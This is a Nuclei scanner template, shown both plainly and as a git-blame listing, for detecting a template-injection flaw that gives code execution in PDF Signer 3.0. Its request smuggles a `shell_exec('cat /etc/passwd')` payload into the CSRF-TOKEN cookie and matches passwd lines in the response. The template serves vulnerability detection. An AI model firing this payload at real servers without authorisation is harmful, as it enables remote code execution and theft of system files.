nuclei-templates/http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml

id: pdf-signer-ssti-to-rce

info:
  name: PDF Signer 3.0 - Template Injection
  author: madrobot
  severity: critical
  description: PDF Signer 3.0 is susceptible to a template injection which allows code execution, due to improper cookie handling and an improper CSRF implementation. An attacker can execute code on the server in the context of the web server.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-1336
  metadata:
    max-request: 1
  tags: ssti,rce,csrf

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
    skip-variables-check: true

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

# digest: 490a004630440220346f42ec245dba5a5da138043cc2f9e8f3e5979db4c9db118d907d6c5dbbc44602203f58036f592e1767eb81a87cdf8169f704f3715b094ef1cadbf36dba96651657:922c64590222798bb761d5b6d8e72950
Update and rename PDF Signer v3.0 - SSTI to RCE via CSRF Cookie.yaml to pdf-signer-ssti-to-rce.yaml 2020-04-08 16:50:31 +00:00			`id: pdf-signer-ssti-to-rce`
Create PDF Signer v3.0 - SSTI to RCE via CSRF Cookie.yaml 2020-04-08 12:45:37 +00:00
			`info:`
Dashboard Content Enhancements (#5582) Dashboard Content Enhancements 2022-10-10 19:22:59 +00:00			`name: PDF Signer 3.0 - Template Injection`
Create PDF Signer v3.0 - SSTI to RCE via CSRF Cookie.yaml 2020-04-08 12:45:37 +00:00			`author: madrobot`
Dashboard Content Enhancements (#5582) Dashboard Content Enhancements 2022-10-10 19:22:59 +00:00			`severity: critical`
			`description: PDF Signer 3.0 is susceptible to a template injection which allows code execution, due to improper cookie handling and an improper CSRF implementation. An attacker can execute code on the server in the context of the web server.`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cwe-id: CWE-1336`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
templateman update 2023-10-14 11:27:55 +00:00			`tags: ssti,rce,csrf`
Create PDF Signer v3.0 - SSTI to RCE via CSRF Cookie.yaml 2020-04-08 12:45:37 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create PDF Signer v3.0 - SSTI to RCE via CSRF Cookie.yaml 2020-04-08 12:45:37 +00:00			`- method: GET`
			`path:`
Preparing for request clustering 2021-01-13 07:31:46 +00:00			`- "{{BaseURL}}"`
templateman update 2023-10-14 11:27:55 +00:00
Create PDF Signer v3.0 - SSTI to RCE via CSRF Cookie.yaml 2020-04-08 12:45:37 +00:00			`headers:`
Fix syntax 2020-05-24 22:19:21 +00:00			`Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"`
misc fixes 2021-10-06 23:53:20 +00:00			`skip-variables-check: true`
templateman update 2023-10-14 11:27:55 +00:00
Fixed default condition OR to AND in false-positives 2020-07-08 11:38:57 +00:00			`matchers-condition: and`
Create PDF Signer v3.0 - SSTI to RCE via CSRF Cookie.yaml 2020-04-08 12:45:37 +00:00			`matchers:`
			`- type: status`
			`status:`
Fix syntax 2020-05-24 22:19:21 +00:00			`- 200`
templateman update 2023-10-14 11:27:55 +00:00
Create PDF Signer v3.0 - SSTI to RCE via CSRF Cookie.yaml 2020-04-08 12:45:37 +00:00			`- type: regex`
			`regex:`
matcher update to handle edge cases 2021-07-24 21:35:55 +00:00			`- "root:.*:0:0:"`
Create PDF Signer v3.0 - SSTI to RCE via CSRF Cookie.yaml 2020-04-08 12:45:37 +00:00			`part: body`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 490a004630440220346f42ec245dba5a5da138043cc2f9e8f3e5979db4c9db118d907d6c5dbbc44602203f58036f592e1767eb81a87cdf8169f704f3715b094ef1cadbf36dba96651657:922c64590222798bb761d5b6d8e72950`